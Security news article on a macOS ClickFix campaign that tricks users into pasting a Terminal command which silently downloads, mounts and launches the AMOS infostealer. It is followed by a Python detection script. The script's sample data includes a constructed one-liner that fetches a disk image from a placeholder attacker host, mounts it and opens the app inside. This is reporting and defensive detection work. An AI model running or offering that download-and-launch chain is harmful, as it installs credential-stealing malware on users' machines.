A new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files.
The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
Researchers at Palo Alto Networks Unit 42 first discovered the campaign and say it begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves.
Once executed, the command downloads a DMG file from an attacker-controlled server, silently mounts it with macOS's native hdiutil utility, locates the application bundle it contains, and launches it automatically.
ClickFix is a social engineering technique that displays fake CAPTCHAs, browser errors, or system alerts to trick visitors into copying and executing attacker-supplied "fix instructions." The technique has grown in popularity among threat actors in the past year and has been used by both cybercriminals and state-sponsored hacking groups to distribute malware.
While ClickFix attacks involving DMGs are not new, previous campaigns typically relied on users manually opening downloaded DMG files to launch malicious applications or execute scripts from attacker-controlled servers.
The campaign spotted by Palo Alto combines both approaches by using a Terminal command to quietly download a DMG file and launch the malware it contains.
[Image: Malicious Terminal command used as fake CAPTCHA verification. Source: Palo Alto Networks Unit 42]
After the victim runs the Terminal command, the first stage downloads a malicious DMG from svs-verificationdate[.]beer using curl with the `-fsSL` flags (fail silently on HTTP errors, suppress progress output, show errors, follow redirects) and saves it to the /tmp folder under a random filename. Because `-s` hides curl's progress meter, nothing appears in the Terminal window while the download runs.
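The download-mount-launch chain described above is what a defender would hunt for in process command-line telemetry. The following Python is an added example (not Unit 42's code and not the campaign's actual command) that scores recorded command lines by how many of the three stages they combine: a quiet curl download into /tmp, an `hdiutil attach`/`mount`, and an `open` of something under /Volumes or ending in `.app`. The sample command lines, the `attacker.example` host, and the `find /Volumes` step used to locate the bundle are constructed assumptions; the article does not say how the real command locates the application.

```python
"""Score shell command lines for the ClickFix DMG chain: curl -> hdiutil -> open.

Added example; the command lines below are constructed, not captured telemetry.
"""
import re
import shlex
from typing import Dict, List, Set

# Constructed sample command lines in the shape an EDR or unified-log
# collector might record them. attacker.example is a placeholder host.
SAMPLE_COMMANDS: Dict[str, str] = {
    # benign: a scripted install that also uses -fsSL and /tmp
    "pkg-install": "curl -fsSL https://get.example.com/install.sh -o /tmp/install.sh",
    # benign: a user mounting a downloaded installer by hand
    "manual-mount": "hdiutil attach -nobrowse ~/Downloads/Firefox.dmg",
    # constructed approximation of the chain the article describes
    "clickfix-chain": (
        "curl -fsSL https://attacker.example/u -o /tmp/aB3dE9 && "
        "hdiutil attach -nobrowse -quiet /tmp/aB3dE9 && "
        "open \"$(find /Volumes -maxdepth 2 -name '*.app' | head -n 1)\""
    ),
}

# Split on command separators only; a single '|' is left alone so a piped
# subshell inside quotes (as in the sample above) stays in one segment.
SEPARATORS = re.compile(r"\s*(?:&&|\|\||;)\s*")
# Matches a token that points into /tmp or /private/tmp.
TMP_PATH = re.compile(r"^/(?:private/)?tmp/")
CHAIN = {"download", "mount", "launch"}


def classify_segment(segment: str) -> Set[str]:
    """Return the attack stages a single shell segment could implement."""
    try:
        argv: List[str] = shlex.split(segment)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        argv = segment.split()
    if not argv:
        return set()

    cmd = argv[0].rsplit("/", 1)[-1]  # strip any leading path (/usr/bin/curl)
    args = argv[1:]
    stages: Set[str] = set()

    if cmd == "curl":
        # -s may be bundled into a cluster such as -fsSL
        clusters = [a[1:] for a in args if a.startswith("-") and not a.startswith("--")]
        quiet = any("s" in c for c in clusters) or "--silent" in args
        to_tmp = any(TMP_PATH.search(a) for a in args)
        if quiet and to_tmp:
            stages.add("download")
    elif cmd == "hdiutil" and args and args[0] in ("attach", "mount"):
        stages.add("mount")
    elif cmd == "open" and any("/Volumes" in a or a.endswith(".app") for a in args):
        stages.add("launch")
    return stages


def score_command(command: str) -> Dict[str, object]:
    """Aggregate stages across a whole command line and return a verdict."""
    stages: Set[str] = set()
    for segment in SEPARATORS.split(command):
        stages |= classify_segment(segment)
    hits = len(stages & CHAIN)
    verdict = "high" if hits == 3 else "medium" if hits == 2 else "low"
    return {"stages": sorted(stages), "verdict": verdict}


if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        print(f"{name:15s} {score_command(cmd)}")
```

The point of scoring the whole line rather than any single tool is that each stage on its own is common on developer machines (the `pkg-install` and `manual-mount` samples score low); it is the combination in one command line, typed by the user into Terminal, that characterises this campaign. A production rule would also need to unwrap `sh -c`/`bash -c` arguments and base64-encoded payloads, which this example does not attempt.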